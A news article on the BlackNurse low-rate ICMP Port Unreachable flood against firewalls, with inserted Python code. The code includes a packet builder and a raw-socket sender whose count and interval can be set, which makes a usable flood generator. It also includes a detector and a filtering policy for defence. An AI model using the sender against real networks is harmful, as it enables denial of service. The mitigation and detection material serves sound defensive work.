Even A Single Computer Can Take Down Big Servers Using BlackNurse Attack

Yes, you only need a single laptop with a decent network connection, rather than a massive botnet, to launch an overwhelming denial of service (DoS) attack and bring down major Internet servers and modern-day firewalls.

Researchers at TDC Security Operations Center have discovered a new attack technique that lone attackers with limited resources (in this case, a laptop and at least 15 Mbps of bandwidth) can use to knock large servers offline.

Dubbed the BlackNurse attack, or the low-rate "Ping of Death" attack, the technique can be used to launch low-volume DoS attacks by sending specially formed Internet Control Message Protocol (ICMP) packets, loosely called 'pings', that overwhelm the processors of firewalls from Cisco, Palo Alto Networks and others, and so take down the servers behind them.

ICMP is the protocol routers and other networking devices use to send and receive error and diagnostic messages.

According to a technical report [PDF] published this week, the BlackNurse attack is more traditionally known as a "ping flood attack" and is based on ICMP Type 3 (Destination Unreachable) Code 3 (Port Unreachable) messages.

These messages are normally replies a host returns to the sender of a packet when the destination port is 'unreachable', for example when a UDP datagram arrives at a port nothing is listening on.

Here's How the BlackNurse Attack Works:


By sending ICMP Type 3 packets with a code of 3, an attacker can cause a denial of service (DoS) condition by overloading the CPUs of certain types of firewalls, regardless of the quality of the network connection.

The BlackNurse traffic volume is very small, ranging from 15 Mbps to 18 Mbps (about 40,000 to 50,000 packets per second), which is laughable compared to the record-breaking 1.1 Tbps DDoS attack recorded against French hosting provider OVH in September.

However, TDC explained that bandwidth is not the problem: the real issue is a steady stream of 40K to 50K ICMP packets per second reaching the victim's network equipment and saturating the target device's CPU.

The good news? The researchers said, "When an attack is ongoing, users from the LAN side will no longer be able to send/receive traffic to/from the Internet. All firewalls we have seen recover when the attack stops."

In other words, this low-volume DoS technique is effective because it does not flood the firewall's links with traffic; it pushes a high per-packet processing load onto the firewall's CPU, knocking the servers behind it offline even when they have plenty of network capacity.
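To make the packet format concrete, here is an added example (it is neither code from TDC's report nor the OVH proof of concept) that builds an RFC 792 Destination Unreachable / Port Unreachable message, the kind of message the technique floods with, verifies its checksum and decodes the datagram it quotes. The addresses and ports are made up for illustration; the raw-socket sender at the end needs root (CAP_NET_RAW) and should only ever be pointed at equipment you own, which is also all the PoC mentioned below is meant for.

```python
# Added example: build and parse an ICMP Type 3 / Code 3 message (RFC 792).
# Not TDC's or OVH's code; addresses and ports below are illustrative.
import socket
import struct
import time


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words (pads odd lengths)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header used as the 'quoted' original datagram.
    Its own checksum is left zero: it is covered by the ICMP checksum anyway
    and the quoted copy is not validated by receivers."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, socket.inet_aton(src), socket.inet_aton(dst))


def build_port_unreachable(orig_src: str, orig_dst: str,
                           orig_sport: int, orig_dport: int) -> bytes:
    """Type 3 / Code 3 message claiming a UDP datagram from orig_src:orig_sport
    to orig_dst:orig_dport hit a closed port.
    Layout: type(1) code(1) checksum(2) unused(4) | quoted IP header + 8 bytes."""
    udp8 = struct.pack("!HHHH", orig_sport, orig_dport, 8, 0)   # UDP header, no payload
    quoted = ipv4_header(orig_src, orig_dst, socket.IPPROTO_UDP, 8) + udp8
    csum = icmp_checksum(struct.pack("!BBHI", 3, 3, 0, 0) + quoted)
    return struct.pack("!BBHI", 3, 3, csum, 0) + quoted


def build_bare_port_unreachable() -> bytes:
    """Header-only Type 3 / Code 3 message with no quoted datagram, i.e. what a
    generator sending an empty-payload ICMP error produces. Technically
    malformed, but it still costs the receiving firewall the same CPU time."""
    csum = icmp_checksum(struct.pack("!BBHI", 3, 3, 0, 0))
    return struct.pack("!BBHI", 3, 3, csum, 0)


def parse_icmp_error(packet: bytes) -> dict:
    """Extract type/code, verify the checksum (re-summing a valid message gives
    zero) and decode the quoted IP header and ports if present."""
    itype, icode, _csum, _unused = struct.unpack("!BBHI", packet[:8])
    info = {"type": itype, "code": icode,
            "checksum_ok": icmp_checksum(packet) == 0, "quoted": None}
    quoted = packet[8:]
    if len(quoted) >= 28:                   # IP header (20) + first 8 bytes
        sport, dport = struct.unpack("!HH", quoted[20:24])
        info["quoted"] = {"proto": quoted[9],
                          "src": socket.inet_ntoa(quoted[12:16]),
                          "dst": socket.inet_ntoa(quoted[16:20]),
                          "sport": sport, "dport": dport}
    return info


def send_probes(dst: str, packet: bytes, count: int = 1, interval: float = 0.001):
    """Send `count` copies toward dst through a raw ICMP socket; the kernel
    prepends the outer IP header. Requires root; lab use on your own gear only."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        for _ in range(count):
            s.sendto(packet, (dst, 0))
            time.sleep(interval)


if __name__ == "__main__":
    pkt = build_port_unreachable("192.0.2.10", "198.51.100.5", 40000, 53)
    print(len(pkt), "bytes:", parse_icmp_error(pkt))
```

A full 3/3 message with a quoted UDP header is 36 bytes at the ICMP layer (56 with the outer IPv4 header), which is why 40,000 to 50,000 of them per second fit in well under 20 Mbps: the cost to the target is per packet, not per byte.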

Researchers said BlackNurse should not be confused with ping flood attacks based on ICMP Type 8 Code 0, that is, regular ping (Echo Request) traffic. The researchers explain:
"The BlackNurse attack attracted our attention because in our anti-DDoS solution we experienced that even though traffic speed and packets per second were very low, this attack could keep our customers' operations down."
"This even applied to customers with large network uplinks and large enterprise firewalls in place. We had expected that professional firewall equipment would be able to handle the attack."

Products Affected


The BlackNurse attack works against the following products:
  • Cisco ASA 5506, 5515, 5525 (default settings)
  • Cisco ASA 5550 (legacy) and 5515-X (latest generation)
  • Cisco Router 897 (can be mitigated)
  • SonicWall (misconfiguration can be changed and mitigated)
  • Some unverified Palo Alto Networks devices
  • Zyxel NWA3560-N (wireless attack from LAN side)
  • Zyxel Zywall USG50

How to Mitigate the BlackNurse Attack?


The good news? There are ways to hold off BlackNurse attacks.

TDC suggested some mitigations and SNORT IDS rules that can be used to detect BlackNurse attacks. Moreover, proof-of-concept (PoC) code posted by an OVH security engineer on GitHub can be used by network admins to test their own equipment against BlackNurse.
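The detection idea behind a thresholded IDS rule, counting Type 3 / Code 3 messages toward one destination inside a short window, can be prototyped over captured packet metadata before touching the sensor. The following is an added example, not TDC's rule set: the 250-per-second threshold, the one-second window and the sample traffic are assumptions chosen for illustration. The real attack runs at 40,000 to 50,000 pps, so the threshold mainly has to sit above the legitimate rate of port-unreachable replies on your own network; measure that before deploying.

```python
# Added example: per-destination sliding-window detector for ICMP Type 3 / Code 3.
# Threshold, window and the constructed sample traffic are assumptions; this is
# not TDC's published Snort rule.
from collections import defaultdict, deque

PORT_UNREACHABLE = (3, 3)   # Destination Unreachable / Port Unreachable
ECHO_REQUEST = (8, 0)       # ordinary ping; a classic flood, deliberately ignored here


class BlackNurseDetector:
    """Counts 3/3 messages per destination in a sliding window and alerts once
    per destination when the count exceeds the threshold."""

    def __init__(self, threshold_pps: int = 250, window_s: float = 1.0):
        self.threshold = threshold_pps
        self.window = window_s
        self.recent = defaultdict(deque)    # dst -> timestamps of recent 3/3 packets
        self.alerted = set()

    def observe(self, ts: float, src: str, dst: str, itype: int, icode: int):
        """Feed one packet's metadata; return an alert dict or None."""
        if (itype, icode) != PORT_UNREACHABLE:
            return None
        q = self.recent[dst]
        q.append(ts)
        while ts - q[0] > self.window:      # expire timestamps outside the window
            q.popleft()
        if len(q) > self.threshold and dst not in self.alerted:
            self.alerted.add(dst)
            return {"dst": dst, "last_src": src, "count": len(q),
                    "window_s": self.window, "at": ts}
        return None


def scan(records, threshold_pps: int = 250):
    """Run the detector over (ts, src, dst, type, code) tuples; return all alerts."""
    det = BlackNurseDetector(threshold_pps)
    alerts = []
    for rec in records:
        alert = det.observe(*rec)
        if alert:
            alerts.append(alert)
    return alerts


def sample_records():
    """Constructed traffic: a 300-packet 3/3 burst inside one second toward one
    firewall, a trickle of legitimate port-unreachable replies toward another
    host, and ordinary echo requests that must not count."""
    recs = [(10.0 + i / 300, "192.0.2.77", "203.0.113.1", 3, 3) for i in range(300)]
    recs += [(float(i), "198.51.100.9", "203.0.113.2", 3, 3) for i in range(20)]
    recs += [(10.0 + i / 50, "192.0.2.5", "203.0.113.1", 8, 0) for i in range(50)]
    return sorted(recs)


if __name__ == "__main__":
    for alert in scan(sample_records()):
        print("possible BlackNurse:", alert)
```

Tracking by destination rather than by source matters: the source address in these packets is trivially spoofable, and a per-source count would be defeated by rotating it.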

To mitigate BlackNurse attacks on firewalls and other equipment, TDC recommends configuring a list of trusted sources from which ICMP is allowed. The simplest mitigation, however, is to drop ICMP Type 3 Code 3 on the WAN interface, and to drop it as early in the pipeline as the device allows (an interface ACL rather than a deeper inspection stage), because the whole problem is the CPU time each packet costs the device.

Palo Alto Networks has also issued an advisory:
"We recommend that you grant permission for the ICMP unreachable message type (type 3). Denying ICMP unreachable messages disables ICMP Path MTU discovery, which can halt IPSec and PPTP traffic."
Note that Path MTU discovery relies on Type 3 Code 4 (Fragmentation Needed), so blocking only Code 3 (Port Unreachable), as TDC suggests, leaves it intact; blocking all of Type 3 does not.
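The two recommendations can be reconciled: filter only Type 3 Code 3 on the untrusted interface, exempt explicitly trusted sources, and leave Type 3 Code 4 alone. The following added example (not vendor code; the interface names, address ranges and the quoted-datagram consistency check are assumptions introduced here) models that decision order as a policy function. On the affected firewalls the cost is CPU time per packet, so the real control is an interface ACL that discards the packets before any inspection engine sees them; this code only makes the policy explicit and testable.

```python
# Added example: inbound ICMP error policy for an untrusted interface.
# Interface names, address ranges and the quoted-datagram check are assumptions.
import ipaddress
import socket
import struct

ACCEPT, DROP = "accept", "drop"
DEST_UNREACHABLE = 3
PORT_UNREACHABLE = 3      # code exploited by BlackNurse
FRAG_NEEDED = 4           # code Path MTU discovery depends on


class IcmpErrorPolicy:
    def __init__(self, our_addresses, trusted_sources=()):
        self.ours = {ipaddress.ip_address(a) for a in our_addresses}
        self.trusted = [ipaddress.ip_network(n) for n in trusted_sources]

    def is_trusted(self, src: str) -> bool:
        ip = ipaddress.ip_address(src)
        return any(ip in net for net in self.trusted)

    def decide(self, src: str, icmp: bytes, interface: str = "wan"):
        """Return (verdict, reason) for one ICMP message from src on `interface`."""
        if len(icmp) < 8:
            return DROP, "truncated ICMP header"
        itype, icode = icmp[0], icmp[1]
        if itype != DEST_UNREACHABLE:
            return ACCEPT, "not Destination Unreachable; outside this policy"
        # 1. TDC's mitigation: no Port Unreachable from untrusted WAN sources.
        if interface == "wan" and icode == PORT_UNREACHABLE and not self.is_trusted(src):
            return DROP, "Type 3/Code 3 from untrusted WAN source"
        # 2. Added consistency check: RFC 792 errors quote the offending datagram
        #    (IP header + 8 bytes), and a genuine one quotes a packet we sent.
        quoted = icmp[8:]
        if len(quoted) < 28:
            return DROP, "no quoted datagram"
        quoted_src = ipaddress.ip_address(socket.inet_ntoa(quoted[12:16]))
        if quoted_src not in self.ours:
            return DROP, "quoted datagram was not sent by us"
        # 3. Whatever is left is accepted; Code 4 in particular must survive.
        if icode == FRAG_NEEDED:
            return ACCEPT, "Fragmentation Needed kept for PMTUD"
        return ACCEPT, "error relates to our own traffic"


def make_unreachable(code: int, quoted_src: str, quoted_dst: str) -> bytes:
    """Constructed test message: ICMP header (checksum left zero) followed by a
    minimal quoted IPv4/UDP header from quoted_src to quoted_dst."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 36, 0, 0, 64, 17, 0,
                     socket.inet_aton(quoted_src), socket.inet_aton(quoted_dst))
    return struct.pack("!BBHI", DEST_UNREACHABLE, code, 0, 0) + ip + b"\x00" * 8


if __name__ == "__main__":
    # Our firewall's outside address and one partner network we trust (assumed).
    policy = IcmpErrorPolicy(["203.0.113.1"], ["198.51.100.0/24"])
    bare_flood = bytes([3, 3, 0xFC, 0xFC, 0, 0, 0, 0])
    print(policy.decide("192.0.2.77", bare_flood))
    print(policy.decide("192.0.2.77", make_unreachable(4, "203.0.113.1", "192.0.2.77")))
```

Step 2 is cheap (a length test and one address lookup) and independently rejects the header-only messages a payload-less generator emits, but it is not a substitute for step 1: on the devices listed above, the CPU is exhausted by processing the packet at all, so the drop must happen at the interface.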
Moreover, independent software vendor NETRESEC has also published a detailed analysis of BlackNurse in its post titled "The 90's called and wanted their ICMP flood attack back".

Besides all these, the SANS Institute has also issued a brief write-up on the BlackNurse attack, discussing the attack and what users should do to mitigate it.